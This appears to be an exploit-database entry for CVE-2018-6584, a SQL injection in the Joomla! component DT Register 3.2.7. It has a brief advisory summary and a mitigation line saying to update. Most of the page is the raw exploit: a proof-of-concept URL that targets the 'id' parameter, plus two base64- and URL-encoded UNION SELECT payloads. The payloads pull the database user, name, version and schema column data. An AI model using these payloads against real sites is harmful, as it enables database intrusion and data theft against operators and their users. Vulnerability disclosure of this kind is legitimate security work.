header-logo
Suggest Exploit
vendor:
DT Register
by:
Ihsan Sencan
9.8
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: DT Register
Affected Version From: 3.2.7
Affected Version To: 3.2.7
Patch Exists: YES
Related CWE: CVE-2018-6584
CPE: a:dthdevelopment:dt_register:3.2.7
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

Joomla! Component DT Register 3.2.7 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component DT Register 3.2.7. An attacker can send a malicious SQL query to the vulnerable parameter 'id' in the 'index.php' file to execute arbitrary SQL commands in the application's database.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the software.
Source

Exploit-DB raw data:

# # # #
# Exploit Title: Joomla! Component DT Register 3.2.7 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://www.dthdevelopment.com/
# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/dt-register/
# Version: 3.2.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6584
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_dtregister&task=edit&controller=category&id=[SQL]
# 
# JTMxJTIwJTIwJTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTI4JTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTMwJTc4JTMyJTM4JTMzJTMxJTMyJTM5JTJjJTI4JTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTUzJTY1JTZjJTY1JTYzJTc0JTJhJTJmJTIwJTY1JTc4JTcwJTZmJTcyJTc0JTVmJTczJTY1JTc0JTI4JTM1JTJjJTQwJTNhJTNkJTMwJTJjJTI4JTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTczJTY1JTZjJTY1JTYzJTc0JTJhJTJmJTIwJTYzJTZmJTc1JTZlJTc0JTI4JTJhJTI5JTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTY2JTcyJTZmJTZkJTJhJTJmJTI4JTY5JTZlJTY2JTZmJTcyJTZkJTYxJTc0JTY5JTZmJTZlJTVmJTczJTYzJTY4JTY1JTZkJTYxJTJlJTYzJTZmJTZjJTc1JTZkJTZlJTczJTI5JTJmJTJhJTIxJTMwJTM3JTM3JTM3JTM3JTc3JTY4JTY1JTcyJTY1JTJhJTJmJTQwJTNhJTNkJTY1JTc4JTcwJTZmJTcyJTc0JTVmJTczJTY1JTc0JTI4JTM1JTJjJTY1JTc4JTcwJTZmJTcyJTc0JTVmJTczJTY1JTc0JTI4JTM1JTJjJTQwJTJjJTc0JTYxJTYyJTZjJTY1JTVmJTZlJTYxJTZkJTY1JTJjJTMwJTc4JTMzJTYzJTM2JTYzJTM2JTM5JTMzJTY1JTJjJTMyJTI5JTJjJTYzJTZmJTZjJTc1JTZkJTZlJTVmJTZlJTYxJTZkJTY1JTJjJTMwJTc4JTYxJTMzJTYxJTJjJTMyJTI5JTI5JTJjJTQwJTJjJTMyJTI5JTI5JTJjJTMwJTc4JTMyJTM4JTMzJTMzJTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM0JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM1JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM2JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM3JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM4JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM5JTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTMxJTMzJTMwJTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTMxJTMzJTMxJTMyJTM5JTI5JTJkJTJkJTIwJTJk
# 
# MSsvKiEwNjY2NlVOSU9OKi8oLyohMDY2NjZTRUxFQ1QqLyUzMCU3OCUzMiUzOCUzMyUzMSUzMiUzOSxDT05DQVRfV1MoMHgyMDNhMjAsVVNFUigpLERBVEFCQVNFKCksVkVSU0lPTigpKSwlMzAlNzglMzIlMzglMzMlMzMlMzIlMzksJTMwJTc4JTMyJTM4JTMzJTM0JTMyJTM5LCUzMCU3OCUzMiUzOCUzMyUzNSUzMiUzOSwlMzAlNzglMzIlMzglMzMlMzYlMzIlMzksJTMwJTc4JTMyJTM4JTMzJTM3JTMyJTM5LCUzMCU3OCUzMiUzOCUzMyUzOCUzMiUzOSwlMzAlNzglMzIlMzglMzMlMzklMzIlMzksJTMwJTc4JTMyJTM4JTMzJTMxJTMzJTMwJTMyJTM5LCUzMCU3OCUzMiUzOCUzMyUzMSUzMyUzMSUzMiUzOSktLSst
# 
# # # #